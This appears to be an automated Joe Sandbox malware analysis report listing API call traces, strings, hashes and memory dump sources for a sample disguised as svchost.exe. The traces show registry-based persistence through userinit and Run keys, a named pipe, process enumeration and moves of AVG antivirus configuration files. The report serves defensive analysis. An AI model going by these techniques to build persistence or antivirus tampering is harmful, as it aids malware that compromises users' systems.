                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseExistsFileOpenPathQueryValue
                                                                                                                                                                                                                • String ID: C:\Windows\apppatch\svchost.exe$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                                • API String ID: 3861587275-2273877672
                                                                                                                                                                                                                • Opcode ID: 64f63e565d3ffb8775fb3fb632827d3123f85ff826fd5a13844e0acf224caa24
                                                                                                                                                                                                                • Instruction ID: 429301189f843e50cd8d4fb95747ef8a46b28bccc228008a88118839e3e1e7ad
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 64f63e565d3ffb8775fb3fb632827d3123f85ff826fd5a13844e0acf224caa24
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7201D831A4424CABFB14C660EC5AFED7368DB54B18F5004A8E546A2240E6B49E888B70
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,74DEF380,?,?,?,02D34A6C,00000000,00000000,00000000), ref: 02D27179
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,02D34A6C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D2718E
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,02D34A6C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D2719D
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,02D34A6C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D271AF
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,02D34A6C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D271BF
                                                                                                                                                                                                                • SetEndOfFile.KERNEL32(00000000,?,?,02D34A6C,00000000), ref: 02D271CC
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000,?,?,02D34A6C,00000000), ref: 02D271EE
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,02D34A6C,00000000), ref: 02D271FF
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$Handle$CloseCreateInformationLockPointerUnlockWrite
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1080409958-0
                                                                                                                                                                                                                • Opcode ID: d09e697f76221a8282c38f5dd9fc8f296cfda2a3510c52f46c8cb5392defcb3c
                                                                                                                                                                                                                • Instruction ID: 54ecc2ad4e37cb934b971a47088824aaedbe8e997c52375c2b478835e015c6cd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d09e697f76221a8282c38f5dd9fc8f296cfda2a3510c52f46c8cb5392defcb3c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4421B031A402247BE7314A26EC4CFABBB6CEFD5758F60C515F9049A380D7718D55C6B0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D26BE1
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: IsNetworkAlive.SENSAPI(02D26BEE,00000000), ref: 02D34B03
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: IsUserAnAdmin.SHELL32 ref: 02D34B11
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: DnsFlushResolverCache.DNSAPI ref: 02D34B1B
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: memset.MSVCRT ref: 02D34B38
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,74DF0F10), ref: 02D34B57
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02D34B70
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D34B83
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: memset.MSVCRT ref: 02D34B9C
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,74DF0F10), ref: 02D34BB5
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02D34BC8
                                                                                                                                                                                                                  • Part of subcall function 02D34AF0: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D34BD5
                                                                                                                                                                                                                • Sleep.KERNEL32(000001F4,76EEC3F0,00000000,74DF0F10), ref: 02D26BFD
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D26C25
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D26870,00000000,00000000,00000000), ref: 02D26C6E
                                                                                                                                                                                                                • WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,-80000001), ref: 02D26C9A
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(?,00000000), ref: 02D26CC7
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 02D26CD8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset$AdminCheckConnectionHandleInternetUserlstrcpyn$AliveCacheCloseCreateFlushInformationMultipleNetworkObjectsResolverSleepThreadWait
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 202280876-0
                                                                                                                                                                                                                • Opcode ID: 9b9b0073f06d9fd97f118b7b3843417a501887469063990c297ed42262a30f22
                                                                                                                                                                                                                • Instruction ID: 6f9cc10816588a853b986b4eae9a3567ed1de2277a4366da6d41f1c69d2ee387
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9b9b0073f06d9fd97f118b7b3843417a501887469063990c297ed42262a30f22
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F313CB194033467D721BF60AC84BAD7BADDB5471CF101564EA05923C0DB74CD99D6F1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNEL32(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004023D6
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 004023F6
                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 004023FC
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040241A
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040241D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$TimeWrite$CloseCreateHandleSystem
                                                                                                                                                                                                                • String ID: \\.\pipe\acsipc_server
                                                                                                                                                                                                                • API String ID: 3225117150-898603304
                                                                                                                                                                                                                • Opcode ID: 94b1d67b28c7260292b1a7477ac8e46b5ec02ea568fbb3c68bcd621bbab052b5
                                                                                                                                                                                                                • Instruction ID: 3dcb9c770a9bbc908c19996743ce3c51c52a4f68684fd20990d5167f2ff57074
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 94b1d67b28c7260292b1a7477ac8e46b5ec02ea568fbb3c68bcd621bbab052b5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B31E0B1C0121CABDB10DFD9D985AEEFBB8FB48314F10422AE614BB280D7B41A458F95
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 00401AC4
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401ACF
                                                                                                                                                                                                                • Process32First.KERNEL32 ref: 00401AF5
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,004010DF), ref: 00401B10
                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,?), ref: 00401B1C
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401B38
                                                                                                                                                                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 00401B4A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Process32$ChangeCloseCreateFindFirstHandleInformationNextNotificationSnapshotToolhelp32memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3068433855-0
                                                                                                                                                                                                                • Opcode ID: f5034955aae474984994a817a0ed0942b8356643e55c240cad4dcfde9e81f7f8
                                                                                                                                                                                                                • Instruction ID: dd63a524005d9bd3fdf31d3318007fe9a0ed814c8c3d3d806708decfbcb8f66e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f5034955aae474984994a817a0ed0942b8356643e55c240cad4dcfde9e81f7f8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9611EBB25043105BC310EF55DC48A9BBBACEBD5360F00453AFE55A3290E734E949CBEA
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D44824
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D4482F
                                                                                                                                                                                                                • Process32First.KERNEL32 ref: 02D44855
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,02D217FF), ref: 02D44870
                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,?), ref: 02D4487C
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D44898
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D448AA
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3955875343-0
                                                                                                                                                                                                                • Opcode ID: 80ecf71541aa282f515d27d036bf46e6cee66a1266cdf16e3e3dee640b6a13a3
                                                                                                                                                                                                                • Instruction ID: 3f9ab7d3c595fabbefb069bddf34359c683cbb9da04c4569b38d8b25d7b36a80
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80ecf71541aa282f515d27d036bf46e6cee66a1266cdf16e3e3dee640b6a13a3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 771190729043916FD310DE65A848BABBBE8EB85760F444A19FD5483380EB349D58CBE2
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: callocexitfree
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3367576030-0
                                                                                                                                                                                                                • Opcode ID: f9a6e219a9df802f9b1fd3bc4b601f1a03169984f5dcdff23169de09c6e3e2b2
                                                                                                                                                                                                                • Instruction ID: fdbcb8b084dda74fb943c4dea7a32cc5f3e5cd16cfc58a019f695b7ae7b1bc05
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9a6e219a9df802f9b1fd3bc4b601f1a03169984f5dcdff23169de09c6e3e2b2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 402168B5A40319AFDB20CF58DC85AAB77A8EB98324F044529FE4597300E771ED14CBA1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathFindFileNameA.SHLWAPI(?), ref: 02D37B7A
                                                                                                                                                                                                                • FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 02D37BB8
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 02D37BD3
                                                                                                                                                                                                                • FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 02D37BDA
                                                                                                                                                                                                                • Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 02D37C01
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 433761119-0
                                                                                                                                                                                                                • Opcode ID: b2ccf767712fd401430522ec1ce11095b28bc85b29da306006bd8fc0ec878307
                                                                                                                                                                                                                • Instruction ID: a5d8495dacdb82b6e500d95532113f47aac724a206f96a67e743460f3b630215
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2ccf767712fd401430522ec1ce11095b28bc85b29da306006bd8fc0ec878307
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DF21A87194061DD7F7139769EC58BEAB7B8AF15704F2445A5E84197380E7B0CD88CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathFindFileNameA.SHLWAPI(?), ref: 02D37B7A
                                                                                                                                                                                                                • FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 02D37BB8
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 02D37BD3
                                                                                                                                                                                                                • FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 02D37BDA
                                                                                                                                                                                                                • Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 02D37C01
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 433761119-0
                                                                                                                                                                                                                • Opcode ID: d569f9891d3d20241c18b104482a76fcc5a706cdba5c18e6480fd75adaadf6af
                                                                                                                                                                                                                • Instruction ID: 89729019eda6470d33f8e7107591d04d8487f03227a60c0ed819ec2d29570200
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d569f9891d3d20241c18b104482a76fcc5a706cdba5c18e6480fd75adaadf6af
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19119171940619DBEB22CB65DC98BDDB7B8AF14704F244594E84197380EBB0DE88CFA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D268A0
                                                                                                                                                                                                                  • Part of subcall function 02D26750: memset.MSVCRT ref: 02D26772
                                                                                                                                                                                                                  • Part of subcall function 02D26750: memset.MSVCRT ref: 02D26790
                                                                                                                                                                                                                  • Part of subcall function 02D26750: lstrcpynA.KERNEL32(?,00000000,00000104,?,?,?,?,?,74DF0F10), ref: 02D267A9
                                                                                                                                                                                                                  • Part of subcall function 02D26750: RegOpenKeyExA.KERNEL32(?,software\microsoft,00000000,00000102,?,?,?,?,?,?,74DF0F10), ref: 02D2681D
                                                                                                                                                                                                                  • Part of subcall function 02D26750: RegSetValueExA.ADVAPI32(?,A1633BD9a,00000000,00000001,?,00000104,?,?,?,?,?,74DF0F10), ref: 02D26843
                                                                                                                                                                                                                  • Part of subcall function 02D26750: RegCloseKey.ADVAPI32(?,?,?,?,?,74DF0F10), ref: 02D26863
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02D268C7
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D268CA
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02D268D7
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D268DA
                                                                                                                                                                                                                  • Part of subcall function 02D263B0: memset.MSVCRT ref: 02D263D8
                                                                                                                                                                                                                  • Part of subcall function 02D263B0: DnsFlushResolverCache.DNSAPI ref: 02D263FC
                                                                                                                                                                                                                  • Part of subcall function 02D263B0: gethostbyname.WS2_32(02D26C17), ref: 02D26406
                                                                                                                                                                                                                  • Part of subcall function 02D263B0: GetTempPathA.KERNEL32(00000104,?), ref: 02D26420
                                                                                                                                                                                                                  • Part of subcall function 02D263B0: GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02D26438
                                                                                                                                                                                                                  • Part of subcall function 02D263B0: calloc.MSVCRT ref: 02D264D6
                                                                                                                                                                                                                  • Part of subcall function 02D263B0: exit.MSVCRT ref: 02D264E5
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$memset$ProcessTemp$AdminCacheCloseFileFlushFreeNameOpenPathResolverUserValidateValuecallocexitgethostbynamelstrcpyn
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1054002843-0
                                                                                                                                                                                                                • Opcode ID: 4f1d3fcf272b3717fe210359c11521f31abb6269a781ea4adf23acfa5a052e44
                                                                                                                                                                                                                • Instruction ID: 79179c121b38468650754ad0fb4989d013c01d406b468d2d530a59f60023ce57
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f1d3fcf272b3717fe210359c11521f31abb6269a781ea4adf23acfa5a052e44
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7F0F4739813346ADA102AA1F80CFCA779DDB90766F000422F904C6380D7BADC68CAF0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402448
                                                                                                                                                                                                                • MoveFileA.KERNEL32(?,?), ref: 0040250F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileFolderMovePath
                                                                                                                                                                                                                • String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
                                                                                                                                                                                                                • API String ID: 1404575960-1083204512
                                                                                                                                                                                                                • Opcode ID: e53c7f5395ff5d23e1ea87fbe032685214c058210a3022917d0998b022fdd273
                                                                                                                                                                                                                • Instruction ID: 2817f7f5a2ee45723a7bffe92fbd27ee54b29152b6db55fc9663a9b726faa6ae
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e53c7f5395ff5d23e1ea87fbe032685214c058210a3022917d0998b022fdd273
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 172151B45042448FC719CF14EA98B92BBF1BB88300F1581F9DA99A73B2D6B0D944CF98
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D2377E
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,?,74DF0A60,7604DB30), ref: 02D237C5
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateMutexmemset
                                                                                                                                                                                                                • String ID: A1633C6Ba$Global\
                                                                                                                                                                                                                • API String ID: 3892072029-1916278781
                                                                                                                                                                                                                • Opcode ID: 40dc633c9afc7f6982c848af85a4e9510df47e0a5413a61249975ff1ed7a5ff3
                                                                                                                                                                                                                • Instruction ID: 69bfbd73d16167a6b9dbdee0135adc63925ef6e0adf3e06d1d38ecb9c75c4081
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40dc633c9afc7f6982c848af85a4e9510df47e0a5413a61249975ff1ed7a5ff3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74019EB1E401195BDB24C938AC19BFB77E4EB91300F4042E5E9C9DB380FAB15D85CB80
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,76ECFFB0,?,?,?,?,?,02D373C7,00000000,?,00000000), ref: 02D4457D
                                                                                                                                                                                                                • GetProcessTimes.KERNEL32(00000000,?,?,?,02D373C7,?,?,?,?,?,02D373C7,00000000,?,00000000), ref: 02D4459A
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,02D373C7,00000000,?,00000000), ref: 02D445B2
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,02D373C7,00000000), ref: 02D445C3
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleProcess$CloseInformationOpenTimes
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3228293703-0
                                                                                                                                                                                                                • Opcode ID: b7576505e55a94b5dbef60322a07fd9ece058867a8b4c3b430338d248d949798
                                                                                                                                                                                                                • Instruction ID: 117890740f3445d5e56e08ca85fe33bda4f6c14ca1c1412ad58ea30883ed0a1a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7576505e55a94b5dbef60322a07fd9ece058867a8b4c3b430338d248d949798
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5511F1B1D00219ABCF00CF96D9889EFFBFCEF98254F54815AE905A7240D7759A45CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D26870,00000000,00000000,00000000), ref: 02D26C6E
                                                                                                                                                                                                                • WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,-80000001), ref: 02D26C9A
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(?,00000000), ref: 02D26CC7
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 02D26CD8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$CloseCreateInformationMultipleObjectsThreadWait
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3242810915-0
                                                                                                                                                                                                                • Opcode ID: 5bc9c2403b3fbb04eebbf3c98d6c2011d516dc015a40e76554cb33020c959258
                                                                                                                                                                                                                • Instruction ID: f718790538f562ad88d10f08e7906c2899f66e11bceaca24f4850ea28393c454
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5bc9c2403b3fbb04eebbf3c98d6c2011d516dc015a40e76554cb33020c959258
